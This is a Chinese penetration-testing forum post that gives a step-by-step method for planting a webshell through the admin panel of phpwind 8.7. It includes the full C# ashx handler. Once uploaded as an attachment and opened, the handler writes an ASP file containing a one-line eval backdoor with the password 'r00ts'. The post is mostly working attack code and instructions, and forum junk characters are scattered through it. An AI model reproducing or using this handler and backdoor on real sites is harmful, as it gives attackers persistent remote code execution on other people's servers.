找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpwind 8.7 后台拿shell
返回列表 发新帖
查看: 3009|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
5 s/ \+ d8 f: M, R) ]. J. I / E$ H1 a, ~! g$ p  R" m6 s3 P
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx" `0 h9 d$ v! k. `0 ^) S' r! G
7 O% M$ V1 E  ]" I  D9 X. x' `
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
- r' x" `+ x0 f9 h, c 0 e8 m, R" d) `2 P# F
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx+ e% G( u- S. A+ u2 b# F" K% G

& I  I0 j% D: Y6 G: h* x打开之后空白 会在目录底下生成r00ts.asp 密码r00ts) G5 b" }  V: i9 @- G/ |9 p6 J

  J& @, ]) h. L7 J5 Q8 Y: O6 d" l- n& `下面是代码:( y: |3 z* T1 r0 S; p

  C3 u: j* n- M7 i6 |1 j<%@ WebHandler Language="C#"Class="Handler" %>) a4 Y2 [; n2 E% T
using System;
8 B4 `' ?' B1 k0 ~using System.Web;
- |3 ^6 M* o$ b7 M* X! ]! qusing System.IO;
8 E) [' g8 R3 h. Q9 Lpublic class Handler : IHttpHandler {
4 T8 @  k9 v+ h# h3 v  I3 cpublic void ProcessRequest (HttpContext context) {( d& z4 t- m( n6 D. d
context.Response.ContentType = "text/plain";/ i8 ^" b$ R, O
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
* g0 k% Q9 K; ]# r' P7 gfile1.Write("<%eval request(\"r00ts\")%>");6 T0 C) M( [% Y9 ~9 g
file1.Flush();5 j2 Z+ t6 Q, I! A0 n3 R
file1.Close();2 ]1 P* V, A1 }5 D% J& Z" q
}
9 w4 ~1 B' n3 b: g  Y# }3 l0 `public bool IsReusable {- Y( @9 c6 W! Q0 \
get {! u% ^, o$ C% G8 @7 E6 |2 ?; J6 y
return false;
; E: _0 _4 O) Y, P' _8 S( l  i" s0 ]}
7 M. l4 }1 S: [4 z- i0 `- R}' F" I) @, R* g4 W/ }9 j
}- e4 S  _+ f$ T& C4 s; v1 |
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表